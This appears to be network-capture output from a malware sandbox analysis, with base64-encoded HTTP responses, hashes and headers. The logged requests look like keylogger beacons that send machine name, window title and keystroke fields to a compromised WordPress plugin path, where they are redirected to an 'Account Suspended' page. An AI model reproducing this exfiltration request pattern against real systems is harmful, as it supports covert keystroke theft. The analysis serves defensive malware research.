Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:54%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 10:54:24 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
26 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:54%20AM text/html post.php 302 Found HTML 379.0 B 07/09/46 07:19:29
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9Mjo1
NCUyMEFNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
72e4103db681780cbce41360d7642b85e31de3de56ead3cfc80abce4bd0af8d8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:54%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Fri, 02 Dec 2016 10:54:25 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:54%20AM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
27 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:54%20AM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 07/09/46 08:07:57
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
